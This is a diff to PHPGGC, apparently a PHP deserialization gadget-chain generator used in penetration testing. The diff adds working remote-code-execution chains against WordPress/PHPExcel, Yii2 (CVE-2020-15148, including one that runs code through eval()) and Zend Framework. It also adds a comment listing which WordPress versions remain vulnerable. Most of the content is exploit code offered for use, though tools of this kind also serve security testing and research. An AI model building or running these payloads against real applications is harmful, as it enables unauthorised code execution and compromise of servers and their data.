6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_Shared_XMLWriter(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
+50
-0
gadgetchains/WordPress/PHPExcel/RCE/5/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
33 class PHPExcel_Shared_XMLWriter {
34 private $tempFileName = '';
35
36 public function __construct($filePath) {
37 $this->tempFileName = $filePath;
38 }
39
40 /*
41 public function __destruct()
42 {
43 // Unlink temporary files
44 if ($this->tempFileName != '') {
45 @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 }
48 */
49 }
+23
-0
gadgetchains/WordPress/PHPExcel/RCE/6/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_Shared_XMLWriter(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
+50
-0
gadgetchains/WordPress/PHPExcel/RCE/6/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
33 class PHPExcel_Shared_XMLWriter {
34 private $_tempFileName = '';
35
36 public function __construct($filePath) {
37 $this->_tempFileName = $filePath;
38 }
39
40 /*
41 public function __destruct()
42 {
43 // Unlink temporary files
44 if ($this->_tempFileName != '') {
45 @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 }
48 */
49 }
+21
-1
gadgetchains/WordPress/generic/gadgets.php less more
1111 [2] https://github.com/WordPress/WordPress/blob/643ec358a40faba739266f11c34990c142f02d98/wp-includes/functions.php#L1057
1212 */
1313
14 // WordPress - https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php
14 /*
15 * Issue was introduced in 4.6 via "HTTP API: Replace internals with Requests library"
16 * See https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php
17 *
18 * On October 29th, 2020, WP 5.5.2 was relased, fixing the issue: https://www.wordfence.com/blog/2020/11/unpacking-the-wordpress-5-5-2-5-5-3-security-release/
19 *
20 * More details:
21 * Versions in 5.x branches have been fixed, at the exception of 5.0.x
22 * 4.x from 4.6 are still vulnerable.
23 *
24 * 5.5.x, fixed in 5.5.2
25 * 5.4.x, fixed in 5.4.3
26 * 5.3.x, fixed in 5.3.5
27 * 5.2.x, fixed in 5.2.8
28 * 5.1.x, fixed in 5.1.7
29 * 5.0.x still vulnerable (latest checked 5.0.11)
30 * 4.9.x still vulnerable (latest checked 4.9.16)
31 * 4.8.x still vulnerable (latest checked 4.8.15)
32 * 4.7.x still vulnerable (latest checked 4.7.19)
33 * 4.6.x still vulnerable (latest checked 4.6.20)
34 */
1535 class Requests_Utility_FilteredIterator extends ArrayIterator {
1636 protected $callback;
1737
+2
-2
gadgetchains/Yii/RCE/1/chain.php less more
11
22 namespace GadgetChain\Yii;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '1.1.20';
77 public static $vector = '__wakeup';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 As the payload uses file_get_contents("data://..."), allow_url_fopen
1111 must be ON.
1212 ';
+26
-0
gadgetchains/Yii2/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\Yii2;
3
4
5 // CVE-2020-15148
6 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
7 {
8 public static $version = '<2.0.38';
9 public static $vector = '__destruct';
10 public static $author = 'russtone';
11 public static $information = 'Executes $function with $parameter using call_user_func.';
12
13 public function generate(array $parameters)
14 {
15 $function = $parameters['function'];
16 $parameter = $parameters['parameter'];
17
18 $cache = new \yii\caching\ArrayCache($function, $parameter);
19 $csb = new \yii\db\ColumnSchemaBuilder($cache);
20 $conn = new \yii\db\Connection($csb);
21 $query = new \yii\db\BatchQueryResult($conn);
22
23 return $query;
24 }
25 }
+40
-0
gadgetchains/Yii2/RCE/1/gadgets.php less more
0 <?php
1
2 namespace yii\db {
3 class ColumnSchemaBuilder {
4 protected $type = 'x';
5 public $categoryMap;
6
7 function __construct($categoryMap) {
8 $this->categoryMap = $categoryMap;
9 }
10 }
11
12 class Connection {
13 public $pdo = 1;
14
15 function __construct($dsn) {
16 $this->dsn = $dsn;
17 }
18 }
19
20 class BatchQueryResult {
21 private $_dataReader;
22
23 function __construct($dataReader) {
24 $this->_dataReader = $dataReader;
25 }
26 }
27 }
28
29 namespace yii\caching {
30 class ArrayCache {
31 public $serializer;
32 private $_cache;
33
34 function __construct($function, $parameter) {
35 $this->serializer = [1 => $function];
36 $this->_cache = ['x' => [$parameter, 0]];
37 }
38 }
39 }
+27
-0
gadgetchains/Yii2/RCE/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\Yii2;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '<2.0.38';
7 public static $vector = '__destruct';
8 public static $author = 'RedTeam Pentesting GmbH';
9 public static $information = 'Executes given PHP code through eval().';
10 public static $parameters = [
11 'code'
12 ];
13
14 public function generate(array $parameters)
15 {
16 $code = $parameters['code'];
17
18 $expression = new \yii\caching\ExpressionDependency($code);
19 $callback = array($expression, 'evaluateDependency');
20 $dbsession = new \yii\web\DbSession($callback);
21 $query = new \yii\db\BatchQueryResult($dbsession);
22
23 return $query;
24 }
25 }
26
+36
-0
gadgetchains/Yii2/RCE/2/gadgets.php less more
0 <?php
1 namespace yii\web
2 {
3 class DbSession
4 {
5 public $writeCallback;
6
7 function __construct($writeCallback) {
8 $this->writeCallback = $writeCallback;
9 }
10 }
11 }
12
13 namespace yii\caching
14 {
15 class ExpressionDependency
16 {
17 public $expression;
18
19 function __construct($expression) {
20 $this->expression = $expression;
21 }
22 }
23 }
24
25 namespace yii\db {
26 class BatchQueryResult {
27 private $_dataReader;
28
29 function __construct($dataReader) {
30 $this->_dataReader = $dataReader;
31 }
32 }
33 }
34
35 ?>
+2
-5
gadgetchains/ZendFramework/RCE/1/chain.php less more
33
44 // Original author: Stefan Esser (2010)
55 // https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf
6 class RCE1 extends \PHPGGC\GadgetChain\RCE
6 class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
77 {
88 public static $version = '? <= 1.12.20';
99 public static $vector = '__destruct';
1010 public static $author = 'mpchadwick'; # GC Implementation
11 public static $informations = '
11 public static $information = '
1212 - Uses preg_replace e modifier which has no effect in PHP >= 7.0.0
1313 - Payload gets executed twice
1414 ';
15 public static $parameters = [
16 'code'
17 ];
1815
1916 public function generate(array $parameters)
2017 {
+2
-2
gadgetchains/ZendFramework/RCE/2/chain.php less more
11
22 namespace GadgetChain\ZendFramework;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '1.11.12 <= 1.12.20';
77 public static $vector = '__toString';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 Uses zf1/zend-form, which requires zf1/zend-cache.
1111 ';
1212
+1
-1
gadgetchains/ZendFramework/RCE/3/chain.php less more
11
22 namespace GadgetChain\ZendFramework;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '2.0.1 <= ?';
77 public static $vector = '__destruct';
+31
-0
gadgetchains/ZendFramework/RCE/4/chain.php less more
0 <?php
1
2 namespace GadgetChain\ZendFramework;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '? <= 1.12.20';
7 public static $vector = '__destruct';
8 public static $author = 'ydyachenko';
9
10 public static $information = '
11 - Based on ZendFramework/RCE1
12 - Works on PHP >= 7.0.0
13 ';
14
15 public function generate(array $parameters)
16 {
17 return new \Zend_Log(
18 [new \Zend_Log_Writer_Mail(
19 [1],
20 [],
21 new \Zend_Mail,
22 new \Zend_Layout(
23 new \Zend_Filter_Inflector(),
24 true,
25 $parameters['code']
26 )
27 )]
28 );
29 }
30 }
+70
-0
gadgetchains/ZendFramework/RCE/4/gadgets.php less more
0 <?php
1
2 class Zend_Log
3 {
4 protected $_writers;
5
6 function __construct($x)
7 {
8 $this->_writers = $x;
9 }
10 }
11
12 class Zend_Log_Writer_Mail
13 {
14 protected $_eventsToMail;
15 protected $_layoutEventsToMail;
16 protected $_mail;
17 protected $_layout;
18 protected $_subjectPrependText;
19
20 public function __construct(
21 $eventsToMail,
22 $layoutEventsToMail,
23 $mail,
24 $layout
25 ) {
26 $this->_eventsToMail = $eventsToMail;
27 $this->_layoutEventsToMail = $layoutEventsToMail;
28 $this->_mail = $mail;
29 $this->_layout = $layout;
30 $this->_subjectPrependText = null;
31 }
32 }
33
34 class Zend_Mail
35 {
36 }
37
38 class Zend_Layout
39 {
40 protected $_inflector;
41 protected $_inflectorEnabled;
42 protected $_layout;
43
44 public function __construct(
45 $inflector,
46 $inflectorEnabled,
47 $layout
48 ) {
49 $this->_inflector = $inflector;
50 $this->_inflectorEnabled = $inflectorEnabled;
51 $this->_layout = '){}' . $layout . '/*';
52 }
53 }
54
55 class Zend_Filter_Callback
56 {
57 protected $_callback = "create_function";
58 protected $_options = [""];
59 }
60
61 class Zend_Filter_Inflector
62 {
63 protected $_rules = [];
64
65 public function __construct()
66 {
67 $this->_rules['script'] = [new Zend_Filter_Callback()];
68 }
69 }
+1
-1
lib/PHPGGC/Enhancement/ASCIIStrings.php less more
4545 $clean_string = '';
4646 for($i=0; $i < strlen($string); $i++)
4747 {
48 $letter = $string{$i};
48 $letter = $string[$i];
4949 $clean_string .= ctype_print($letter) && $letter != '\\' ?
5050 $letter :
5151 sprintf("\\%02x", ord($letter));
+2
-1
lib/PHPGGC/Enhancement/PlusNumbers.php less more
88 * With 's':
99 * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;}
1010 *
11 * Note: Since PHP 7.2, only i and d (float) types can have a +.
11 * Note: Since PHP 7.2, only i and d (float) types can be prefixed by
12 * a plus sign.
1213 */
1314 class PlusNumbers extends Enhancement
1415 {
+16
-0
lib/PHPGGC/GadgetChain/RCE/Command.php less more
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class Command
6 * Executes a command (bash/batch).
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class Command extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_COMMAND;
12 public static $parameters = [
13 'command'
14 ];
15 }
+17
-0
lib/PHPGGC/GadgetChain/RCE/FunctionCall.php less more
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class FunctionCall
6 * Executes a PHP function with one argument.
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class FunctionCall extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_FUNCTIONCALL;
12 public static $parameters = [
13 'function',
14 'parameter'
15 ];
16 }
+16
-0
lib/PHPGGC/GadgetChain/RCE/PHPCode.php less more
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class PHPCode
6 * Executes PHP code.
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class PHPCode extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_PHPCODE;
12 public static $parameters = [
13 'code'
14 ];
15 }
+2
-4
lib/PHPGGC/GadgetChain/RCE.php less more
44 abstract class RCE extends \PHPGGC\GadgetChain
55 {
66 public static $type = self::TYPE_RCE;
7 public static $parameters = [
8 'function',
9 'parameter'
10 ];
7 # TBD by subclasses
8 public static $parameters = [];
119 }
+11
-0
lib/PHPGGC/GadgetChain/SSRF.php less more
0 <?php
1 namespace PHPGGC\GadgetChain;
2
3 abstract class SSRF extends \PHPGGC\GadgetChain
4 {
5 public static $type = self::TYPE_SSRF;
6 public static $parameters = [
7 'uri'
8 ];
9 }
10 ?>
+15
-11
lib/PHPGGC/GadgetChain.php less more
3737 public static $vector = '';
3838 public static $author = '';
3939 public static $parameters = [];
40 public static $informations;
40 public static $information;
4141
4242 # Types
43 const TYPE_RCE = 'rce';
44 const TYPE_FI = 'file_include';
45 const TYPE_FR = 'file_read';
46 const TYPE_FW = 'file_write';
47 const TYPE_FD = 'file_delete';
48 const TYPE_SQLI = 'sql_injection';
43 const TYPE_RCE = 'RCE';
44 const TYPE_RCE_FUNCTIONCALL = 'RCE (Function call)';
45 const TYPE_RCE_PHPCODE = 'RCE (PHP code)';
46 const TYPE_RCE_COMMAND = 'RCE (Command)';
47 const TYPE_CMD = 'CMD';
48 const TYPE_SSRF = 'SSRF';
49 const TYPE_FR = 'File read';
50 const TYPE_FW = 'File write';
51 const TYPE_FD = 'File delete';
52 const TYPE_SQLI = 'SQL injection';
4953 const TYPE_INFO = 'phpinfo()';
5054
5155 function __construct()
125129
126130 $strings = [];
127131
128 if(static::$informations)
132 if(static::$information)
129133 {
130 $informations = trim(static::$informations);
131 $informations = preg_replace("#\n\s+#", "\n", $informations);
132 $infos['Informations'] = "\n" . $informations;
134 $information = trim(static::$information);
135 $information = preg_replace("#\n\s+#", "\n", $information);
136 $infos['Informations'] = "\n" . $information;
133137 }
134138
135139 foreach($infos as $k => $v)
+17
-9
lib/PHPGGC.php less more
450450 /**
451451 * Displays a list of gadget chains.
452452 */
453 protected function list_gc()
453 protected function list_gc($filter)
454454 {
455455 $this->o("");
456456 $this->o("Gadget Chains");
467467 $data = [];
468468 foreach($this->chains as $chain)
469469 {
470 if($filter && stripos($chain::get_name(), $filter) === false)
471 continue;
470472 $data[] = [
471473 $chain::get_name(),
472474 $chain::$version,
473475 $chain::$type,
474476 $chain::$vector,
475 ($chain::$informations ? '*' : '')
477 ($chain::$information ? '*' : '')
476478 ];
477479 }
478480
499501
500502 $this->o('INFORMATION');
501503 $this->o(' -h, --help Displays help');
502 $this->o(' -l, --list Lists available gadget chains');
503 $this->o(' -i, --informations');
504 $this->o(' Displays informations about a gadget chain');
504 $this->o(' -l, --list [filter] Lists available gadget chains');
505 $this->o(' -i, --information');
506 $this->o(' Displays information about a gadget chain');
505507 $this->o('');
506508 $this->o('OUTPUT');
507509 $this->o(' -o, --output <file>');
554556 $this->o(' --test-payload');
555557 $this->o(' Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.');
556558 $this->o(' The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.');
557 $this->o(' Warning: This will run your payload on YOUR system !');
559 $this->o(' Warning: This will run the payload on YOUR system !');
558560 $this->o('');
559561
560562 $this->o('EXAMPLES');
563 $this->o(' ' . $this->_get_command_line(
564 '-l'
565 ));
566 $this->o(' ' . $this->_get_command_line(
567 '-l drupal'
568 ));
561569 $this->o(' ' . $this->_get_command_line(
562570 'Laravel/RCE1',
563571 'system',
614622
615623 foreach($valid_arguments as $k => $v)
616624 {
617 $abbreviations[$k] = $k{0};
625 $abbreviations[$k] = $k[0];
618626 }
619627
620628 $abbreviations = [
691699 break;
692700 }
693701 # This is a parameter or an option
694 if(strlen($arg) >= 2 && $arg{0} == '-')
702 if(strlen($arg) >= 2 && $arg[0] == '-')
695703 $this->_parse_cmdline_arg($i, $argv, $parameters, $options);
696704 # This is a value
697705 else
705713 switch($option)
706714 {
707715 case 'list':
708 $this->list_gc();
716 $this->list_gc(count($arguments) ? $arguments[0]: null);
709717 return;
710718 case 'help':
711719 $this->help();